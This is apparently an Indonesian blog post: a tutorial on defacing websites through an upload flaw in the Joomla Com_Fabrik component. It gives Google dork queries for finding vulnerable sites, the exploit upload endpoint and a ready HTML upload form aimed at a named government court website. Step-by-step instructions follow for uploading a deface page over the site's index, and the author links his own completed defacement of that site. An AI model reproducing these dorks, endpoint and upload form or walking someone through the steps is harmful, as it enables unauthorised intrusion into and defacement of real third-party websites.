Tutorial Deface Com_Fabrik CSRF+Live Target

Assalamualaikum wr.wb

Sudah lama nggak update tutorial nih, ada yang kangen nggak sama admin.He he he, kali ini saya akan membagikan tutorial deface poc Com_Fabrik with CSRF.Langsung saja pada materi

-Dork : inurl:index.php?option=com_fabrik
             inurl:index.php/component/fabrik/ site:.dk
             inurl:index.php?option=com_fabrik&view= site:
             inurl:importcsv.php site:
             inurl:viewTable?cid= site:com

-Exploit : index.php?option=com_fabrik&format=raw&task=plugin.pluginAjax&plugin=fileupload&method=ajax_upload

-CSRF nya copy disini : <form method="POST" action="http://www.pn-jeneponto.go.id/index.php?option=com_fabrik&format=raw&task=plugin.pluginAjax&plugin=fileupload&method=ajax_upload" enctype="multipart/form-data"> <input type="file" name="file" /> <button> Upload </button> </form>

NB : Site diatas dapat diganti dengan site mu sendiri, yang tentunya vuln Com_Fabrik.Dan itu adalah Live Target dari saya.Setelah copy CSRF tersebut tinggal pastekan di aplikasi html editor kesayangan anda masing2 dan save dengan format html

Oke langkah pertama kita dorking ke google dulu gunain dork yg diatas penampakan bisa di lihat di bawah

Setelah itu pilih site yang ingin kalian deface

selanjutnya masukan exploit yg diatas tadi /index.php?option=com_fabrik&format=raw&task=plugin.pluginAjax&plugin=fileupload&method=ajax_upload
Contoh : http://www.pn-jeneponto.go.id/index.php?option=com_fabrik&format=raw&task=plugin.pluginAjax&plugin=fileupload&method=ajax_upload

Ciri2 vuln seperti gambar dibawah

Nah kalau udah selesai CSRF nya silahkan di edit dulu , ganti dan masukan site yg vuln yg udah kalian dapat tadi and save.

Kemudian buka CSRF html tadi lewat browser.Kemudian pilih Choose File , pilih script deface kesayangan kalian dari pc/android kalau mau tebas index ganti nama script mu menjadi index.html.Dan langkah terakhir tekan upload.Tara..Website pun terdeface.

Ini hasil saya : http://www.pn-jeneponto.go.id/r0z.html

Sekian untuk tutorial hari ini.Bila ada yang bingung bisa komen

Wassalamualaikum wr.wb

Komentar

Postingan Populer